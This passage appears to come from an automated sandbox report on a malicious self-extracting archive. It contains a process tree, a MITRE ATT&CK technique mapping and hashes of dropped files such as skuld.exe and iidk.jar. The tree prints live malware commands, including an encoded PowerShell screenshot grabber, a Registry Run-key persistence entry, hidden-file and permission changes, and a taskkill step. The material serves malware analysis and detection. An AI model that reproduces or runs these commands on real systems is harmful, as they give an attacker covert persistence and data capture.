KAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4456
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eeye3j5h\eeye3j5h.cmdline"
        6⤵
        
        PID:1300
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C99.tmp" "c:\Users\Admin\AppData\Local\Temp\eeye3j5h\CSC511DCC11BF1842B4ABFE32790CC125.TMP"
        7⤵
        
        PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3396
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
        5⤵
        
        PID:868
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
      4⤵
      PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" java -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\iidk.jar""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
      java -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\iidk.jar"
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2432
    - - C:\Windows\system32\icacls.exe
        
        C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        5⤵
        Modifies file permissions
        
        PID:4436
    - - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1719558075586.tmp
        5⤵
        Views/modifies file attributes
        
        PID:2612
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1719558075586.tmp" /f"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:864
      - C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1719558075586.tmp" /f
        6⤵
        Adds Run key to start application
        
        PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im cmd.exe /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

Filesize
46B

MD5
c82f2b906cb1412e853ba20f8d0b42e4

SHA1
3b9d3497f509c795291f0ac819a8a171120d8dc3

SHA256
895fdf763ea2b2ebe82a7007edc9043b3cf2dd1ed0498f452a1eb0dbc2da6bf6

SHA512
e8eb4f51b0b4451a2d3bae32bd5e306789111f2ba05855cc5b57105d0918799ac47e9123f31b085ee2710d14b9e34838327434f784f237a1f1c3b5dfe6d08f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a2c8179aaa149c0b9791b73ce44c04d1

SHA1
703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

SHA256
c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

SHA512
2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1CcmMdLEph\Display (1).png

Filesize
437KB

MD5
932d4d6ada368b769a40e3c80c2045ad

SHA1
c88a642040ef621c43800663fe5438be500c69a0

SHA256
1154ec481f4b4f3a544a9ba35a4603a53661d8f80f5802563bb7dc2f9d9187ad

SHA512
908d6d3ce76153684236388fb4fe0d5061fe690049ec7093f129978fa348543d85ecf8c064c6ad22a0e52b4fb682d5a8ac6f95c1c8b5212f9c7ad365972bb73e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4C99.tmp

Filesize
1KB

MD5
da6d27a8db957391e3fb001943a6cd40

SHA1
22047a8b55e9653915504130c04117bd7b21e433

SHA256
e1750f80c9e848569ab59f37e7f04db7806ac06387d04ad33d0da095d19e3c22

SHA512
928c1dc9acf59ddb600105780a5c36d929f3c2bea82bf7ced718aeb8bb175139dd9011efc1c4ffeacd4e07ac7bbb5382d301c63f7fba64d43e17b52615be4828

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

Filesize
563B

MD5
76c3d1865f41ab708d1e2accf999d3c8

SHA1
9502f0b7e4387a1facbc30ef0cc5915cd15da126

SHA256
d23dd8777f83432b7583ab2e41b07dd5406b114bd3bd50eaf8a841476099bd43

SHA512
cd800c73ec7cd61df4e4f7613af05aa067b7c07fd4bf1cbdc3e978887a1106e0d849d02b42d5d231049af62625ed39029a95197d1daa976672f20831f4ae7a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\iidk.jar

Filesize
639KB

MD5
252fd90861780cafa9c3636effd29d37

SHA1
a5338e8c723f9643de231fbbe95bd4930964ac39

SHA256
2d0ffc551620087ec69cbd4102297e9cd531d7d5e8337c8559795b5cc962d665

SHA512
f53406416525546a66984ced9fef87226f23d818fb6f6e073adfe7c7983d08acd428047cc91934468ba8009a468da4fe368018bbaf001fe56f12b9ba4282b8b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe

Filesize
9.5MB

MD5
22216d85e929d3537d5e0c323e0e88db

SHA1
72e75f35acfa36dc3e28c16ecfcca46f335c7d74

SHA256
f06335e29583075184a183ab4346b02966d85ea83c63197cf59ee8b1dd72a149

SHA512
319e14b6b24707530ecf1cae601f14b8b5ff3a36a4aa8509c100b7b157fa58e4936457d6306e6bb70a1993fdfc2ca8763f754058498c8ebdddf84fd8aaf7999b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat

Filesize
54B

MD5
18ef03e1045b224a70d9afdf8247a241

SHA1
117b3959ded227b5cf0015229db0386f6479df70

SHA256
daf87ae302bcd7c7a65f6db2b93216116de0621169f724f564812a6a8614f33d

SHA512
2ef552283ed844801dc6b7a2ec143e1e52f77b6f7ee2516bb70b3c8db6592eaef9e435f063bbb94019ac135c2e37ccfcb9db8f926a7358c3590b3fc9c63beafd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

Filesize
74B

MD5
b3be17a14609d812602af67da8b7acc2

SHA1
e1fcc3e3989ee6846694eba252622a336ce63795

SHA256
f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

SHA512
780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

Filesize
340B

MD5
6943c2eb7e78b8b8cb8171b940de20f2

SHA1
e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

SHA256
eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

SHA512
1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5dt4hov.2z3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\eeye3j5h\eeye3j5h.dll

Filesize
4KB

MD5
1c7747c203b705cf0caa93c884696193

SHA1
0f6d4856738d44d91202bd117dbb0fe1b52a48dc

SHA256
d7c515a729b5034f8b6287dc3f983d3375680edbabf4d332ccd4486a7d599d98

SHA512
41d9d4ee73676c37f58282f7ceee91570cbf736d338bbbe0e84f8a3b8a5b37883991a641eb6084402ecb7824b9966ab769dab98aa746c6c7e39946acbbf1415e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eeye3j5h\CSC511DCC11BF1842B4ABFE32790CC125.TMP

Filesize
652B

MD5
fc2b988f6be0e54f11639c099d9985d3

SHA1
52f4283579a08e30a503f9bb6fb48c0608b36631

SHA256
e27cff8ae5ff24f2a6ffafe1f4290d3ed6cab629a42c95011f2c1953c663b9c0

SHA512
5ae32b4ed7d47bd69a6b5bd0944a73c9948bb82e16aa19463abfc8ee7c983ad9db8eb3c9f4e8ec10f590aec2f95e3c9b40a57ac85f7d601c63e5182bb96dd483

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eeye3j5h\eeye3j5h.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eeye3j5h\eeye3j5h.cmdline

Filesize
607B

MD5
8ee1a30385c9e1a1c829bf0c5b828f1e

SHA1
373dad0b840461d5bbe44528d33eb92d9727a99d

SHA256
eca3a9b47543870094bbfb90f8ee3982a3571b101acf90e36a54e3f5d29a8aaa

SHA512
336705bc7fa32ccb17baaacdb9ca52dfd126a1806ea2f6452a4a3771fa2fb6be935b8db6077db37508d62c59c2047640527f1f5264b269970d49053eb25e297f

Download Submit
memory/2432-71-0x000001BD90630000-0x000001BD90631000-memory.dmp

Filesize
4KB

Download
memory/2432-39-0x000001BD90630000-0x000001BD90631000-memory.dmp

Filesize
4KB

Download
memory/4108-63-0x0000020676E60000-0x0000020676E82000-memory.dmp

Filesize
136KB

Download
memory/4456-114-0x000001116A750000-0x000001116A758000-memory.dmp

Filesize
32KB

Download